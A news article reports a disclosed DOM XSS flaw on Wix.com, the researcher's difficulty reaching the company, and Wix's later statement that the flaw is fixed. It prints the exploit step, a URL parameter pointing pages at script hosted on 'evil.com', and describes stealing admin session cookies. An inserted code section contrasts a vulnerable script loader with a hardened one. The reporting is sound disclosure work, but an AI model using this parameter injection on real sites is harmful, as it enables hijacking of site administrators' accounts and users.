Wix.com security flaw places millions of websites at risk

Updated: The bug, discovered and disclosed in October, is an XSS flaw which can lead to compromised admin accounts.
Written by Charlie Osborne, Contributing Writer

An XSS vulnerability discovered on the Wix.com platform is putting millions of websites and their users at risk of attack.

The website hosting provider, which offers free drag-and-drop website building tools, hosts millions of websites and has 87 million registered users -- and all of those sites are currently vulnerable to an XSS bug which attackers can use to create worms capable of taking over administrator accounts. This, in turn, gives attackers full control over the affected websites.

On Wednesday, Matt Austin, security research engineer with Contrast Security, said in a blog post that Wix.com has a severe DOM XSS vulnerability which can be exploited by simply adding a single parameter to any site created on Wix.com.

All an attacker needs to do is append a single parameter to any Wix.com URL that points the page at malicious JavaScript hosted elsewhere. For example:

Add: ?ReactSource=http://evil.com to any URL for any site created on wix.com. Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js

By adding this simple code, attackers can ensure their JavaScript is loaded and run as part of the target website, according to the researcher.
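The root cause described above is a page that builds a script URL from an untrusted query parameter. The following is an added illustration of that bug class, not Wix.com's actual code: a constructed vulnerable loader beside a hardened one that only accepts an origin from a fixed allowlist. The default base, the allowlist entries and the function names are assumptions.

```javascript
// Loader path as named in the disclosure.
const LOADER_PATH = "/packages-bin/wixCodeInit/wixCodeInit.min.js";

// Vulnerable pattern (constructed illustration, not the real Wix code):
// whatever base the query string supplies becomes the script origin.
function unsafeLoaderUrl(search, defaultBase) {
  const params = new URLSearchParams(search);
  const base = params.get("ReactSource") || defaultBase;
  return base.replace(/\/+$/, "") + LOADER_PATH;
}

// Hardened pattern: the parameter may only select among pre-approved
// origins; anything else silently falls back to the default base.
function safeLoaderUrl(search, defaultBase, allowedOrigins) {
  const params = new URLSearchParams(search);
  const requested = params.get("ReactSource");
  let base = defaultBase;
  if (requested !== null) {
    let parsed = null;
    try {
      parsed = new URL(requested); // throws on relative or malformed input
    } catch (e) {
      parsed = null;
    }
    // Compare the full origin (scheme + host + port), never a substring
    // or prefix, so "https://cdn.example.com.evil.com" is rejected too.
    if (parsed && parsed.protocol === "https:" &&
        allowedOrigins.includes(parsed.origin)) {
      base = parsed.origin;
    }
  }
  return base.replace(/\/+$/, "") + LOADER_PATH;
}

// Constructed sample values for a stand-alone run.
const DEFAULT_BASE = "https://cdn.example.com";
const ALLOWED = ["https://cdn.example.com", "https://cdn2.example.com"];
const ATTACK = "?ReactSource=http://evil.com";

console.log("unsafe:", unsafeLoaderUrl(ATTACK, DEFAULT_BASE));
console.log("safe:  ", safeLoaderUrl(ATTACK, DEFAULT_BASE, ALLOWED));
```

A Content-Security-Policy script-src directive limited to the same allowlist gives a second, browser-enforced layer should the validation ever be bypassed.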

Attackers can also use template demos, hosted on the main Wix.com domain -- and vulnerable -- to gain access to admin session cookies and resources. Once a session cookie has been stolen, attackers can place the DOM XSS in an iframe to host malicious content on any website controlled by a single operator.

If such an attack is successful, once a hacker has administrator-level control of the Wix.com domain, they have free rein to do as they wish -- including spreading malware, modifying the website, mining cryptocurrency, altering account credentials, and potentially even using the compromised domain as part of a browser-based botnet.

Austin says that on October 10, he requested a security contact in order to disclose the issue. The next day, the researcher once again requested a contact and was given a support ticket. However, after receiving a generic "We are investigating the matter and will follow up as soon as possible" message and sending frequent requests for updates throughout October, Austin then sent a direct email to support@wix.com and security@wix.com.

The response from Wix.com stated that the "group you tried to contact (security) may not exist, or you may not have permission to post messages to the group."

The problem remains unpatched and it appears that Wix.com, despite being responsible for the security of millions of users, has yet to get its act together when it comes to security and disclosures.


In related news, last month WordPress founder Matt Mullenweg accused Wix.com of being "built with stolen code." The executive has accused Wix.com of having "copied WordPress without attribution, credit, or following the license."

Wix.com CEO Avishai Abrahami admitted that aspects of the Wix.com platform are based on the WordPress open-source library, but everything which was improved upon was released back to the open-source community.

Update 11.57 GMT: A Wix spokesperson told ZDNet:

"We take the security of our customers very seriously. After thorough examination we can state that the issue has been addressed. We do operate a formal bug bounty program and are taking steps to widen the community."
